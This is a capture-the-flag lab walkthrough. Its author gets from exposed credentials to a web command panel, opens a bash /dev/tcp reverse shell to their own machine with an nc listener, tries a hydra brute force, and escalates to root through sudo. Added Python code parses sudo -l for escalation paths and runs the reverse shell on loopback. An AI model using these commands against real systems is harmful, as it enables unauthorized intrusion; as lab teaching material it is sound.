1. The first step for any such challenge is to scan the server with nmap. I generally use the options -A and -T4, and you can also run NSE scripts alongside them by adding --script=vuln. That produces a lot of output to sift through for the relevant pieces, but on the plus side it sometimes turns up valuable information.
2. Port 80 was open, so I knew the box was serving a web page. I checked its robots.txt file and found a string: Wubbalubbadubdub
At this point we have no idea what this string is for, so just make a note of it for now and move on.
3. Then I checked the source code of the homepage we were given, which contained something interesting: a username, R1ckRul3s
That gave me a hunch that the string from robots.txt might actually be a password for something.
4. Next I ran DirBuster to locate hidden files and directories on the server. This led me to a login page.
5. The next step is obvious: use R1ckRul3s as the username and try Wubbalubbadubdub as the password to see if we can log into the server.
To tell you the truth, I first pointed hydra at the login form with the rockyou.txt wordlist, and only after a minute did it click that the string was probably the password all along. It was.
6. Logged in. The page presents a text field for entering commands, and typing ls into it showed that it runs Linux commands directly on the server.
7. You might be thinking that it is easy from here: just cat the file to view its contents. But no, cat does not work here.
8. We do have alternatives to cat, though, and less worked perfectly. Running less Sup3rS3cretPickl3Ingred.txt gives us our 1st ingredient: mr. meeseek hair
9. Since I effectively have command execution on the server through that web panel, I started looking around in the home folder.
10. As before I used less to open the file I found there, which gave us our 2nd ingredient: 1 jerry tear
11. At this point I realised that I might not be logged in as root, so I checked with the whoami command: I was the www-data user.
12. Now the only thing on my mind was privilege escalation, so I checked which commands this user is allowed to run through sudo. The command for that is sudo -l
13. The line (ALL) NOPASSWD: ALL means that www-data may run any command as any user through sudo, and without being asked for a password. So I tried sudo bash to get a root shell, but from the web command field that did not work: the panel runs a command to completion and returns its output, and an interactive shell with no terminal attached has nothing to read from, so it simply exits.
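As an added example (my code, not the author's), here is a small parser for sudo -l output that extracts the rules listed under "may run the following commands" and turns each into the next thing to try, so the reading of (ALL) NOPASSWD: ALL above can be checked mechanically and narrower grants are routed to a GTFOBins lookup instead. The two sudo -l transcripts inside it are constructed; the hostname and Defaults line are invented.

```python
"""Parse `sudo -l` output and point at the escalation it implies (added example)."""
import re
from dataclasses import dataclass, field
from typing import List

# Constructed sample in the shape sudo -l prints; hostname and Defaults are invented.
SAMPLE_FULL = """\
Matching Defaults entries for www-data on ip-10-10-11-22:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User www-data may run the following commands on ip-10-10-11-22:
    (ALL) NOPASSWD: ALL
"""

# Second constructed sample: a narrower grant, which needs a GTFOBins lookup instead.
SAMPLE_NARROW = """\
User www-data may run the following commands on ip-10-10-11-22:
    (root) NOPASSWD: /usr/bin/less, /usr/bin/find
    (root) /usr/bin/systemctl
"""

# One rule line: "(runas_user[:runas_group]) [TAG: ...] cmd1, cmd2"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>\S.*)$")


@dataclass
class SudoRule:
    runas_user: str
    nopasswd: bool
    commands: List[str] = field(default_factory=list)


def parse_sudo_l(text: str) -> List[SudoRule]:
    """Return the rules listed after the 'may run the following commands' header."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules else None
        if not m:
            continue  # Defaults lines, blanks, anything not a rule
        runas_user = m.group("runas").split(":")[0].strip()   # "(ALL : ALL)" -> "ALL"
        tags = {t.strip(": ").upper() for t in m.group("tags").split() if t.strip()}
        cmds = [c.strip() for c in m.group("cmds").split(",") if c.strip()]
        rules.append(SudoRule(runas_user, "NOPASSWD" in tags, cmds))
    return rules


def escalation_hints(rules: List[SudoRule]) -> List[str]:
    """Map each rule to the command worth trying next, as reasoned at steps 12-13."""
    hints = []
    for r in rules:
        as_root = r.runas_user in ("ALL", "root")
        for cmd in r.commands:
            if cmd == "ALL" and as_root and r.nopasswd:
                hints.append("sudo bash  # unrestricted and no password: root shell directly")
            elif cmd == "ALL" and as_root:
                hints.append("sudo bash  # unrestricted, but needs this user's password")
            elif as_root:
                need = "no password" if r.nopasswd else "password required"
                name = cmd.rsplit("/", 1)[-1]
                hints.append(f"sudo {cmd}  # look up {name} on gtfobins.github.io ({need})")
            else:
                hints.append(f"sudo -u {r.runas_user} {cmd}  # lateral move only, not root")
    return hints


if __name__ == "__main__":
    for sample in (SAMPLE_FULL, SAMPLE_NARROW):
        for hint in escalation_hints(parse_sudo_l(sample)):
            print(hint)
```

Paste real sudo -l output into parse_sudo_l to use it; anything before the "may run the following commands" line is ignored, so the Defaults block does not confuse it.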
14. The next thing to try was the same command from a real terminal, which meant getting a reverse shell. I went to GTFOBins (gtfobins.github.io), looked up bash and its reverse shell entry, and found the following one-liner, which I adapted to my case:
bash -c 'exec bash -i &>/dev/tcp/$RHOST/$RPORT <&1'
so this became
bash -c 'exec bash -i &>/dev/tcp/<my_ip_address>/12345 <&1'
15. Then I started a listener on port 12345 in a terminal on my own machine with the following command: nc -lvnp 12345
16. Finally I ran the reverse shell one-liner in the command field on the site. And voilà, I got a shell in my terminal.
17. Then I ran sudo bash, which worked this time because the reverse shell gives bash a real stdin to read from, and I finally had root on the system. To end the challenge I looked in the root folder and printed the only file there, our 3rd ingredient: fleeb juice
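The following added example (mine, not the author's) reproduces steps 13 to 17 on the loopback interface. command_box() stands in for the web command field: it runs a string through bash with no stdin, waits for it to finish and returns the output. reverse_shell_roundtrip() plays the nc -lvnp listener, fires the GTFOBins one-liner at it and sends a command over the socket. It assumes a local bash built with /dev/tcp support (the default on most Linux distributions); since there is no sudo grant on the test machine, bash -i stands in for sudo bash, which is enough to show why the interactive shell dies in the box but answers over the socket.

```python
"""Loopback demo of why an interactive shell dies in the command box but works over a
reverse shell. Added example; runs entirely on 127.0.0.1 and needs bash with /dev/tcp."""
import socket
import subprocess
from subprocess import DEVNULL, PIPE, STDOUT

# The GTFOBins one-liner from the writeup, with RHOST/RPORT left as placeholders.
REVERSE_SHELL = "bash -c 'exec bash -i &>/dev/tcp/{rhost}/{rport} <&1'"


def command_box(cmd: str, timeout: float = 10.0) -> str:
    """Stand-in for the web command field: run the string through a shell with no
    stdin, wait for it to finish, and hand back whatever it printed."""
    done = subprocess.run(["bash", "-c", cmd], stdin=DEVNULL, stdout=PIPE,
                          stderr=STDOUT, timeout=timeout)
    return done.stdout.decode(errors="replace")


def reverse_shell_roundtrip(command: str = "echo shell-ok", timeout: float = 15.0) -> str:
    """Listen on a loopback port (what nc -lvnp does), launch the one-liner against it
    the way the command box would, send one command plus 'exit', and return everything
    the interactive shell wrote back over the socket."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind(("127.0.0.1", 0))   # port 0: kernel picks a free port (the page used 12345)
    listener.listen(1)
    listener.settimeout(timeout)
    port = listener.getsockname()[1]

    payload = REVERSE_SHELL.format(rhost="127.0.0.1", rport=port)
    # Detach stdio exactly as the command box would; the shell's only I/O is the socket.
    victim = subprocess.Popen(["bash", "-c", payload], stdin=DEVNULL,
                              stdout=DEVNULL, stderr=DEVNULL)
    try:
        conn, _ = listener.accept()
    finally:
        listener.close()
    chunks = []
    try:
        conn.settimeout(timeout)
        conn.sendall(f"{command}\nexit\n".encode())
        while True:
            data = conn.recv(4096)
            if not data:          # shell exited, so its end of the socket closed
                break
            chunks.append(data)
    finally:
        conn.close()
        victim.wait(timeout=timeout)
    return b"".join(chunks).decode(errors="replace")


if __name__ == "__main__":
    # In the box an interactive shell reads EOF at once and exits; control comes straight back.
    print(command_box("bash -i; echo back-in-the-box"))
    # Over the socket the same shell stays up and answers.
    print(reverse_shell_roundtrip("id"))
```

The first call returns immediately with the shell's "no job control" complaints followed by the echo, which is what the web panel showed the author for sudo bash; the second returns the command's output because the shell's stdin, stdout and stderr are all the TCP connection.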